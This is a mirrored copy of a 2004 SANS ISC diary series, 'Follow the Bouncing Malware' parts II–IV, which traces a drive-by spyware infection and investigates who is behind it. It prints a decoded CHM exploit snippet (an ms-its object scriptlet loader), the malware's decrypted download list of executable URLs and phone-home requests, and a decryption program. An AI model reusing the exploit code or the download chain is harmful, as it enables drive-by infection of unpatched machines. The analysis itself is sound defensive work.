\u0069\u0074\u0065\u0028\u0063\u006f\u0064\u0065\u002e\u0076\u0061\u006c
\u0075\u0065\u002e\u0072\u0065\u0070\u006c\u0061\u0063\u0065\u0028\u002f
\u005c\u0024\u007b\u0050\u0041\u0054\u0048\u007d\u002f\u0067\u002c\u006c
\u006f\u0063\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066
\u002e\u0073\u0075\u0062\u0073\u0074\u0072\u0069\u006e\u0067\u0028\u0030
\u002c\u006c\u006f\u0063\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072
\u0065\u0066\u002e\u0069\u006e\u0064\u0065\u0078\u004f\u0066\u0028\u0027
\u0068\u0070\u0031\u002e\u0068\u0074\u006d\u0027\u0029\u0029\u0029\u0029
\u003b\u000d\u000a\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e
\u000d\u000a\u000d\u000a')[/script]
Once again, this isn’t difficult to decode, and results in:
<textarea id="code" style="display:none;">
[object data="&#109;s-its:mhtml:file://C:\foo.mht!${PATH}/HP1.CHM::/hp1.htm"\
type="text/x-scriptlet"][/object]
</textarea>
[script language="javascript"]
document.write(code.value.replace(/\${PATH}/g,location.href.substring\
(0,location.href.indexOf('hp1.htm'))));
[/script]
Another .chm exploit that will eventually result in the download and execution of a file called hp1.exe.
Here we go again... and trust me, hp1.exe is a real piece of work.
Stay tuned for Part III...
Note: When I first started writing this up, I was completely unaware of how deeply down the rabbit hole it would take me. I honestly believed that it would only be a fairly long diary entry... then two fairly long diary entries... and now it is obvious that we’re heading into three parts at the very least. I’ll try to get Part III (and any other remaining posts) up more quickly.
------------------------------------------------------------------------
 


Tom Liston´s Following the Bouncing Malware -  Part III

Note: Most of the links in the following are not "clickable" on purpose. Think of it as a warning...

Before we begin our tumble down the rabbit hole once more, just a few brief words:

For those of you who have been following this little excursion: thank you for your patience. It’s probably difficult to completely understand the amount of time that each of these little essays takes to research and write. While I’ve been working on this particular installment, there were also the distractions of family, job, the daily “stuff” coming in at the SANS ISC, MS04-028, GDIScan, turning the ISC into the GDIScan helpdesk (sorry gang!), windsurfing the halls at NS2004 in Vegas, etc..., etc... You have my sincere apologies for the wait, as well as my fervent hope that it was worth it.

With that out of the way, why don’t we “warm up” by quickly retracing the path we’ve already trod? Perhaps now would be a good time to take a bathroom break and grab a fresh container of your favorite adult beverage, ‘cause once this caravan rolls, we ain’t stoppin’. Go on, I’ll wait...

Ready? Good. Let’s go!

In the beginning, there was Joe Average. And Joe didst buy himself a computer and conneceth it to the Internet. And with his computer, Joe did surfeth, and readeth email, and playeth many games. And Joe looked upon the Internet, and it was Good.

But while Joe did possess knowledge of the Internet Good, he did not understand that Evil too lived on the Internet. And he patcheth not.

Then one day, Joe didst unknowingly go to a Bad Place, and much Evil befell his shiny new computer.

How Evil? Very, VERY Evil:

From Follow The Bouncing Malware, Part I
(http://isc.sans.org/diary.php?date=2004-07-23 ):

1) Joe's homepage had been changed. It is now set to:
http://default-homepage-network.com/start.cgi?new-hkcu

2) Joe’s default search page has been set to:
http://server224.smartbotpro.net/7search/?new-hkcu

3) Search assist has been turned off.

4) "TV Media Display" has been installed on Joe's machine.

5) addictivetechnologies.net had graced Joe's machine with a file identified by AV software as Win32/TrojanDownloader.Rameh.C.

And, from Follow The Bouncing Malware, Part II
(http://isc.sans.org/diary.php?date=2004-08-23 ):

6) Joe’s computer, at the behest of the Addictive Technologies malware, downloaded “instructions” from F1Organizer.com

7) Following those instructions, new “Favorites” were added to Joe’s browser, and two new “gifts” (SplWbr.dll and ezbdlLs.dll) were installed on his computer.

8) The installation of SplWbr.dll dumped an “Ad Destroyer and Virtual Bouncer” from SpyWare Labs, Inc. and “TopRebates.com AutoTrack software” onto Joe’s computer.

9) The installation of ezbdlLs.dll dropped a “Utility for downloading files and upgrading software” from “ABetterInternet”, a utility to “Make Your Internet Browsing Simple, Exciting, and Personal” from the fine folks at “ezULA”, and an affiliate ID hijacker called SAHAgent onto Joe’s PC.

10) Finally, the file hp1.exe was downloaded and executed via a .CHM exploit.

That’s where we stopped last time, with my promise that the file “hp1.exe” was “a real piece of work.”
So... let’s take a look at hp1.exe.

The file hp1.exe contains 49,152 bytes o’ Visual Basic goodness (guffaw). The file’s version information claims that it was created by a company called “df”, with an internal name of “bigs104”. Launching this beastie begins bringing down a veritable rain of malware on a machine. Sit back and try to keep up as we follow the bouncing malware:

First, it contacts "http://mmm.roings.com/bundle.php?aff=bigs104" and downloads 1449 bytes of some sort of data:
388
{}{}{}wrds======ckkcha*gki+waevgl9uxwaevgl*}elkk*gki+waevgl9tx
}elkk*gki+v+w|+.9txv`w*}elkk*gki+9txwaevgl*iwj*gki+vawqhpw*ewt9ux
eqpk*waevgl*iwj*gki+vawqhpw*ewt9uxc*iwj*gki+9ux
ekhwaevgl*gki+ekhgki+waevgl9uqav}xwaevgl*ekh*gki+ekhgki+waevgl9uqav}x
ehhplasaf*gki+waevgl9uxsaf*ewo*gki+saf9uxkravpqva*gki+`+waevgl9Oa}skv`wx
gkjpajp*kravpqva*gki+`+waevgl9Oa}skv`wxiw|ih*mjbkwtega*gki+lkia+`kc9uosx
mjbkwtega*gki+lkia+`kc9uosxwaevgl*japwgeta*gki+jw+waevgl9uqav}x
japwgeta*gki+jw+waevgl9uqav}xehpermwpe*gki+saf+vawqhpw9ux
waevgl*h}gkw*gki+`abeqhp*ewt9uqav}xh}gkw*gki+waevgl*ewt9uqav}x
waevgl*aevplhmjo*jap+pvego9uxwaevgl*hkkowievp*gki+t+waevgl9up
{}{}{}doms======faewp}wtkvpeh*2|*pk9995xxxgavmeh~*gki9996xxx
`vmjoi}*gki9995
{}{}{}ver======17
{}{}{}pay======yes
{}{}{}ip======aa.bbb.cc.dd (note: this was Joe’s machine’s IP address)
{}{}{}phases======`veckjfehh~9995xxxgvegow9996xx
mb$}kq$qwa$plmw$wmpa9995
{}{}{}sewers======wa|$bkv$bvaa9995xxxwa|9996xxxikva$wa|$bkv$ia9995
12
{}{}{}outers======
175
xxxxxi}a|a999lppt>++fmjw6*ia`me)ikpkv*jap+wkbp+hke`w+999i}a|a999999EHHx
JQHHxxxxxerepev999lppt>++sss*erepevvawkqvgaw*gki+`mwp+ewp[0[ii*a|a999ewp[0
[ii*a|a999ewp[0[ii*a|a999QWxAFxEQxGExCFxxxxx
a6cmra999lppt>++fmjw6*ia`me)ikpkv*jap+wkbp+Ia`meIkpkv61*a|a999Ia`meIkpkv61*
a|a999Ia`meIkpkv61*a|a999QWxGExxxxx
qjwpeh999lppt>++qtw*vkmjcw*gki+wkbp+qjwpehh*a|a999qmjwpehhav999999EHHx
JQHH
f
{}{}{}reg======
5c
xxxxxkg|5<999lppt>++fmjw6*ia`me)ikpkv*jap+wkbp+ii64*kg|999ii64*kg|999ii64*kg|
999EHHxQWxGExAF
6
{}{}{}
0
(Note: the data has been reformatted to display better in the Diary.)

Well, what the heck does all of that mean? Hmmm... it’s obviously a “generated on the fly” data file, because the file contained, in plain-text, the IP address of the NAT firewall that Joe’s machine was behind. It also appears to have been “encrypted” in some manner.

Given some time, and several pieces of paper wadded up and thrown at the cat in frustration, your intrepid author cracked the code, and wrote the following program to decrypt the data:
#include <stdio.h>

int main(int ac, char **av) {
FILE *in, * out;
char buffer[80], *c, val;
int cont = 1;

if(ac != 2){puts("Usage: df_decrypt filename"); return 1;}
if((in = fopen(av[1], "r")) == NULL){puts("Cannot open input file."); return 2;}
if(!(out = fopen("output.txt", "w"))){puts("Cannot open output file."); return 3;}
while(cont){
if(fgets(buffer, sizeof(buffer), in)){
c = buffer;
while(*c){
if(*c != '\n'){
val = *c & 7;
if(val < 4) *c = *c + 4;
else *c = *c - 4;
}
c++;
}
fputs(buffer, out);
} else cont = 0;
}
fclose(in); fclose(out);
return 0;
}
Filling the decrypted data back into the file alongside any original data that is obviously “keywords” results in the following unencrypted file:
388
{}{}{}wrds======google.com/search=q|search.yahoo.com/search=p|
yahoo.com/r/sx/*=p|rds.yahoo.com/=p|search.msn.com/results.asp=q|
auto.search.msn.com/results.asp=q|g.msn.com/=q|aolsearch.com/aolcom/search=query|
search.aol.com/aolcom/search=query|alltheweb.com/search=q|web.ask.com/web=q|
overture.com/d/search=Keywords|content.overture.com/d/search=Keywords|
msxml.infospace.com/home/dog=qkw|infospace.com/home/dog=qkw|
search.netscape.com/ns/search=query|netscape.com/ns/search=query|
altavista.com/web/results=q|search.lycos.com/default.asp=query|
lycos.com/search.asp=query|search.earthlink.net/track=q|
search.looksmart.com/p/search=qt
{}{}{}doms====== beastysportal.6x.to===1|||cerialz.com===2|||drinkmy.com===1
{}{}{}ver======17
{}{}{}pay======yes
{}{}{}ip======aa.bbb.cc.dd (note: this was Joe’s machine’s IP address)
{}{}{}phases====== dragonballz===1|||cracks===2||if you use this site===1
{}{}{}sewers====== sex for free===1|||sex===2|||more sex for me===1
12
{}{}{}outers======
175
|||||myexe===http://bins2.media-motor.net/soft/loads/
===myexe======ALL|NULL
|||||avatar===http://www.avatarresources.com/dist/ast_4_mm.exe
===ast_4_mm.exe===ast_4_mm.exe===US|EB|AU|CA|GB
|||||e2give===http://bins2.media-motor.net/soft/MediaMotor25.exe
===MediaMotor25.exe===MediaMotor25.exe===US|CA
|||||unstal===http://ups.roings.com/soft/unstall.exe
===uinstaller======ALL|NULL
f
{}{}{}reg======
5c
|||||ocx18===http://bins2.media-motor.net/soft/mm20.ocx
===mm20.ocx===mm20.ocx===ALL|US|CA|EB
6
{}{}{}
0
After downloading this “control data” file, Joe’s computer then contacts "http://www.mastermind.com/a?l=PeAyF1sgrZYw&i=aaa.bbb.ccc.ddd" on TCP port 8010 (where aaa.bbb.ccc.ddd is Joe’s computer’s IP address) and has three lines of data returned: “2”, “US”, “0”.

This ties in with what appear to be “country codes” found within various portions of the unencrypted data file. It appears that the malware will react differently depending on the country where the infected machine is located. The script at www.mastermind.com takes the IP address and returns a country code. The other two codes (“2” and “0”) appear to control different aspects of the malware’s behavior.

Immediately upon receiving the “US” country code from mastermind.com, Joe’s computer contacts "http://bins2.media-motor.net/soft/mm20.ocx" and downloads, installs, and registers this 61,440 byte OCX. Examining this file, it appears to be an OCX version of hp1.exe. It contains many of the same strings, and appears to offer the same functionality. I would assume that it acts as a resident version of hp1.exe.

Next, hp1.exe contacts "http://bins2.media-motor.net/soft/loads/8-24.exe" and downloads a 40,960 byte executable. The “8-24” name is derived from the date at the time of the download (August 24th).

Based upon the “marching orders” within the unencrypted datafile, Joe’s computer now contacts "http://www.avatarresources.com/dist/ast_4_mm.exe" and downloads a 129,152 byte executable. It then contacts "http://bins2.media-motor.net/soft/MediaMotor25.exe" and downloads a 9,056 byte executable.

Both of these files are launched, and MediaMotor25.exe immediately initiates a download from "http://64.7.220.98/downloads/IeBHOs.dll" which is a 129,536 byte long BHO (Browser Helper Object) that is installed into (duh) IE (Internet Explorer). IeBHOs.dll is a known component of adware from “e2give.” Because it is installed into IE and becomes, essentially, part of the browser, it is in the perfect position to monitor the URLs being “surfed” and to change Joe's browser's requests when going to specific sites in order to “direct” affiliate commissions to e2give. According to the e2give.com website, “e2give will donate a portion of each qualifying purchase to the e2give charities network.” This, of course, makes it perfectly fine for them to install their software onto Joe’s machine without his permission. (Yes, that was sarcasm.)

The ast_4_mm.exe file from avatarresources.com is a Wise installation executable. As it installs, it phones home to let the fine folks at avatarresources know that it has found a new place to live:

"http://www.avatarresources.com/count/count.php?&mm2_us&mm2_new_nocpr"

The Wise installation has it’s own downloading engine which contacts the interestingly named “www.wenksdisdkjeilsow.com” and accesses the URL “http:// www.wenksdisdkjeilsow.com/config/?v=5&n=mm2&i=” which, despite the fact that it generates errors, sends back more configuration information (sheesh guys, if you’re going to go through all the trouble to set this stuff up, at least set the permissions correctly on your scripts...)
566
<br />
Warning: SAFE MODE Restriction in effect.
The script whose uid is 500 is not allowed to access
/usr/local/psa/home/vhosts/wenksdisdkjeilsow.com/httpdocs
/config/log owned by uid 10011 in/usr/local/psa/home
/vhosts/wenksdisdkjeilsow.com/httpdocs/config/index.php
on line 24<br /><br />
Warning: fopen("/usr/local/psa/home/vhosts
/wenksdisdkjeilsow.com/httpdocs/config/log", "a") -
Inappropriate ioctl for device in /usr/local/psa
/home/vhosts/wenksdisdkjeilsow.com/httpdocs
/config/index.php on line 24<br />
<br />
Warning: fputs(): supplied argument is not a
valid File-Handle resource in /usr/local/psa
/home/vhosts/wenksdisdkjeilsow.com/httpdocs/config/index.php
on line 25<br />
<br />
Warning: fclose(): supplied argument is not a
valid File-Handle resource in /usr/local/psa
/home/vhosts/wenksdisdkjeilsow.com/httpdocs/config/index.php
on line 26<br />
[URLS]
2,http://tt2.avres.net/tt/remove_spyware.exe
2,http://tt2.avres.net/tt/curgsi.exe
3,http://searchlocate.com/toolbar/searchlocate.exe

[VERSION]
5

[PROGRAM URL]
http://www.wenksdisdkjeilsow.com/files/ast_5_main.exe

[ID]
ArKJ9t9HzRnbf0GineJhq

[PRIORITY]
1,http://tt2.avres.net/tt/cpr_mm2.exe
2,http://tt2.avres.net/tt/ab1.exe
3,http://tt2.avres.net/tt/tvm_bundle.exe
4,http://tt2.avres.net/tt/cpr_mm2.exe

0
That’s just really BAD programming: you MUST check that those handles returned are valid when you open a file... dang... that’s Programming 101 Stuff. But I digress...

Hey! Look there! I see more URLs pointing to executable files. Gee, I wonder what’ll happen...?

Anyway... we now manage to round out the list of files that was in our original encrypted configuration data, and Joe’s machine goes out and grabs a file from "http://ups.roings.com/soft/unstall.exe." This actually does appear to be some sort of uninstall program, written in Visual Basic, and weighing in at 45,056 bytes. It only seems targeted at the files directly installed by the hp1.exe file, though.

But, lest we forget, we still have a Wise install running in the background. And, you guessed it, in “PRIORITY” order, it downloads:

"http://tt2.avres.net/tt/cpr_mm2.exe" (270,415 bytes)
"http://tt2.avres.net/tt/ab1.exe" (500,869 bytes)
"http://tt2.avres.net/tt/tvm_bundle.exe" (53,738 bytes)
"http://tt2.avres.net/tt/cpr_mm2.exe" (270,415 bytes - ????????)

Yes, you read that correctly. It DID download the exact same file twice. (It must be a personality trait of the morally bankrupt that they can be both clever and inane at the same time. The authors of these programs really do pull off some amazing stuff... but then they follow that up almost immediately by doing some amazingly STUPID stuff. Consistency guys, consistency...)

While all of that is happening, hp1.exe (Remember that file? It’s the one we started this installment with...) phones home to tell the folks at roing.com that all is well in malware-land, that it has done everything it was supposed to do, and that it deserves a big ol’ digital pat on the back:

"http:// logs.roings.com/log3.php?c={D358D17F-0D1A-4A98-A98D-810B01216183} &what=newinstall&aff=bigs104&country=US&ocx18=1&myexe=1&avatar=1&e2give=1"

“See! Look what I did! I installed ‘ocx18’ (mm20.ocx), ‘myexe’ (8-24.exe), ‘avatar’ (ast_4_mm.exe), and ‘e2give’ (MediaMotor25.exe) on this poor schmoe’s computer! Aren’t you proud of me?”

Not to be outdone, our Wise installer needs to phone home and let everyone know what a good job it did too:

"http://www.avatarresources.com/count/count.php?&mm2cpr_new"

So where does this leave us?

Well, Joe’s computer now has had so many fun and exciting “additions” installed I’m beginning to lose track. Let’s see: Joe’s computer now has two “affiliate buck” redirectors (SAHAgent and e2give), it’s had stuff from avatarresources.com installed, as well as all of those files from tt2.avres.net. And there’s more... trust me, there’s more.

Remember: this is all the result of visiting a SINGLE website with an unpatched machine.

If you ever need to explain to someone the pitfalls involved in not patching, all you need to do is point them to this listing:

The score card thus far (and I’m only counting executable content):

hp2.exe (16,384 bytes)
tvmupdater4bp5.exe (195,072 bytes)
AtPartners.dll (96,256 bytes)
SplWbr.dll (454,656 bytes – expands out to 3 files making up 892,288 bytes)
ezbdlLs.dll (151,040 bytes – expands out to 4 files making up 314,880 bytes)
hp1.exe (49,152 bytes)
mm20.ocx (61,440 bytes)
8-24.exe (40,960 bytes)
MediaMotor25.exe (9,056 bytes)
ast_4_mm.exe (129,152 bytes)
IeBHOs.dll (129,536 bytes)
cpr_mm2.exe (270,415 bytes)
ab1.exe (500,869 bytes)
tvm_bundle.exe (53,738 bytes)
and of course cpr_mm2.exe (270,415 bytes) again...

The shameful total (thus far... there’s more to come):
15 files – 2,428,141 bytes downloaded
20 files – 3,029,613 bytes on disk

And, no doubt, I missed a few...
I started Part II of “Bouncing Malware” by saying that Joe’s PC was no longer his own. With over 2 MB of software downloaded, installed, and executed without his permission, I would say that there is little doubt that Joe ISN’T the guy running the show. But who is?

In the next installment, I want to finish up looking at some of the software installed on Joe’s PC and then turn my sights to finding out a little more about the folks responsible for the deluge of spyware and adware that assault our machines and networks on a daily basis. Stay tuned... it’s gonna be fun.


------------------------------------------------------------------------

Tom Liston´s Following the Bouncing Malware - Part IV:

-------------------------------------------------------------------------

For those that missed previous episodes:

Follow The Bouncing Malware - Part I - http://isc.sans.org/diary.php?date=2004-07-23
Follow The Bouncing Malware - Part II - http://isc.sans.org/diary.php?date=2004-08-23
Follow The Bouncing Malware - Part III - http://isc.sans.org/diary.php?date=2004-11-04

=========================================================================

Follow The Bouncing Malware - Part IV

As this little expedition has wound its way among the malicious flotsam and jetsam of the Internet, I’ve received hundreds of emails echoing the same question:

"Tom, please tell us: who are these people?"

(Ok... I’ve actually gotten ONE email and it asked me to please stop rambling so much. Consider the above to be "artistic license.")

So, rather than diving headfirst into dissecting more code this time, I thought I would take a little "side trip" and see what I could find out about the people who have given us the "gifts that keep on giving." Who are the people profiting off of messing up Joe’s machine?

Since we’ve got a different goal, it calls for a different attitude-- a kinder, gentler approach. We’re going to roll-back the geek-factor a bit and spend a little time away from the hard-core code analysis. To celebrate, I’m all decked out in my fuzzy Garfield slippers (small children/Father’s Day/no choice/don’t ask...) and I’m ready to rock. To round things out, let’s even give this installment a cool Sub-Title:

Follow The Bouncing Malware IV: Mellowing In Fleecy Footwear

(Sorry, couldn’t help myself)

Ok... Let’s see what we can find out...

If you’ve been following along since the beginning, perhaps you noticed something odd. Perhaps after reading through the description of what happened to Joe’s machine, you’ve a feeling that there’s something bigger going on-- something amiss with what you’ve seen, but you just can’t quite put your finger on it.

I know how you feel. It’s that "something" that’s been slowly pecking away at my subconscious since this whole trip began and has finally surfaced into consciousness only recently. Here it is:

In FTBM-1:

1) Joe goes to "yahoogamez.com" and gets served up a banner ad from aim4media.com
2) That ad contains an IFRAME that loads mynet-MML.html from 205.236.189.58
3) mynet-MML.html contains a script that loads hp2.htm from 69.50.139.61
4) hp2.htm whacks Joe’s box with a CHM exploit named (originally enough) hp2.chm
5) hp2.chm goes out and grabs a file called (seeing a pattern?) hp2.exe
6) hp2.exe installs "TV media display" on Joe’s machine.

In FTBM-2:

1) A trip to Joe’s new default home page (changed in FTBM-1 to "http://default-homepage-network.com"... no one ever said that these guys were creative when it came to names...) results in the display of "http://default-homepage-network.com/newspynotice.htm," a warning that Joe’s computer might be (well, duh!) infected with spyware.
2) In "newspynotice.htm," we found some obfuscated JavaScript that pointed an IFRAME to a file called (hold on.. in case you’re just skimming through this, you need to really start paying attention now, because this is important...) "hp1.htm" from 69.50.139.61
3) hp1.html then whacks Joe's box with a CHM exploit named (originally enough) hp1.chm
4) hp1.chm goes out and grabs a file called (once again, seeing a pattern?) hp1.exe

Hey... HEY... HEY! What the heck is that all about?

Well, obviously, the folks who put mynet-MML.html on 205.236.189.58 and newspynotice.htm on "http://default-homepage-network.com" share the same stunted imagination when it comes to filenames.

Or something like that...

Therefore, our goal for today is to try to tie "http://default-homepage-network.com", 205.236.189.58, and 69.50.139.61 together.

So... where do we begin?

Doing a DNS lookup on "default-homepage-network.com" we find that it resolves to 205.236.189.57.

B-I-N-G-O!

Well, let’s see... who administers that block?:

Block: 205.236.189.0 - 205.236.189.255
Service Telematique Service Internet de Montreal
6187A Louis Veuillot
Montreal, QC H1M2N8
Canada

So how does 69.50.139.61 tie into this? They’re using that IP address to start the ball rolling, so to speak, but why use a different server?

Block: 69.50.139.0 - 69.50.139.127
OMEGABYTE Computer Corporation
205 West Ninth Street, Suite 201
Austin, TX 78701

A quick look at Omegabyte’s website shows us the beginnings of an answer: Omegabyte is a hosting provider. It appears that our "Canadian" friends at "default-homepage-network.com" rented themselves a server down in Texas. Why?

Well, if my little excursion into spyware-land has taught me anything, it’s that very little in this ever-shifting terrain stays static. The anti-spyware battle is fought with many of the same "rules" as the anti-virus battle: he who adapts the fastest survives. If you present a fixed target, you get filtered or blocked or "signatured" out of existence. At this point, many of the sites that I’ve mentioned in this chronicle are no longer spyware dumps, having long since been tossed aside once their useful lifetime had expired. In all likelihood, both the Canada and Texas sites are simply innocent hosting companies who were used for connectivity.

So it appears that the people in the spyware industry have taken a cue from the spammers and they use throwaway accounts and hosting services to do their dirty work. And just like with the spammers, by the time we get around to filtering and blocking a server, they’ve moved on to another.

While IP addresses may come and go, domain names are forever... So! What can we find out about "default-homepage-network.com"?

The domain name is registered to:

Seismic Entertainment Productions, Inc.
11 Farmington Road
Rochester, NH 03867

and a little searching on "Seismic Entertainment Productions, Inc." leads to:

http://www.ftc.gov/os/caselist/0423142/0423142.htm

Which is a document entitled: "Federal Trade Commission, Plaintiff, v. Seismic Entertainment Productions, Inc., SmartBot.net, Inc., and Sanford Wallace, Defendants., United States District Court, District of New Hampshire"

For those of you who have had any dealings in anti-spam circles, the name "Sanford Wallace" should ring a very VERY loud bell. Sanford "The Spam King" Wallace has had a very checkered past. His company, Cyber Promotions, was a target of much anti-spam rage in the late ‘90s. Supposedly ol’ "Spamford" had reformed his ways around the turn of the century and had gone "legit."

Apparently not...

It appears that Mr. Wallace has slipped into his old ways and gotten himself into a bit o’ trouble with the U.S. Federal Trade Commission for alleged "deceptive practices affecting commerce."

Strangely enough, if you read through the complaint linked at the FTC’s site:

http://www.ftc.gov/os/caselist/0423142/041012comp0423142.pdf

you’ll see that much of the badness that Mr. Wallace’s "Seismic Entertainment Products, Inc." is alleged to have done has been documented quite nicely in "Follow The Bouncing Malware." The complaint also specifies another of Mr. Wallace’s ventures, passthison.com, which is mentioned in FTBM-2.

According to the FTC’s complaint, the former Spam King's actions have placed him in the crosshairs of a Federal investigation carrying penalties "including, but not limited to, rescission of contracts and restitution, and the disgorgement of ill-gotten gains."

Personally, I’d pay foldin’ money to watch that "disgorgement of ill-gotten gains" part.

So, now let’s return to the question that prompted this little side-trip: “Who are these people?”

Well, at least in this case, we’re able to put an alleged name (and an alleged face, if you’re so inclined: http://www.annonline.com/interviews/970522/biography.html ) to one the folks dumping spyware onto our computers.

Somehow, turning over this particular rock and finding a "reformed" spammer underneath it doesn’t seem so surprising. The ethical leap from spamming to spyware isn’t across a great chasm, but rather over a slight scratch in the pavement. Ethically challenged individuals, for whom the profit motive outweighs all else, seem quite at home in either category. What seems to be missing in their character boils down to a complete disregard for the legitimacy of property rights. To them, it’s not your inbox, your bandwidth, or your computer if they can figure out a way to sneak something past your defenses. In another time and place, they would be highwaymen, embezzlers, or con-artists.

Therefore, in honor of the season, I hereby nominate Sanford "The Spam King" Wallace for the first annual "ISC Tin-Pot Turkey" award for (allegedly) being both a low-life spammer and a scummy purvayor of spyware. Let's hope he spends some time in an orange jumpsuit, "married" to whoever has the most cigarettes.

In the next edition, I promise to editorialize a little less and return to analyzing malicious code. In the meantime, I’ll keep my eye on the FTC case and update you if anything happens.

Finally, before I once again take my leave and begin work on FTBM-5, I’d like to place a simple challenge onto the (virtual) table: Over the course of these articles, I’ve taken several jabs at the folks behind the crud that attempts to infest our computers each time we surf the web. I’ve questioned their skills and their ethics, and I stand behind every dang word I've written. If, however, you either work currently in the spyware industry or have in the past (and I know you guys are reading this...) and you would like to step forward (anonymously or not) and discuss or debate the ethics of what it is you do, please contact me using the ISC’s contact form, found at http://isc.sans.org/contact.php.

Yo Spamford! Care to chat?

  www.sgillis.com  |  www.sgillis.net  |  www.n3ujj.com  |  www.n3ujj.net  |  Current Location


Visits Since 10/01/2007

 

 

Page Last Edited February 4, 2009 11:31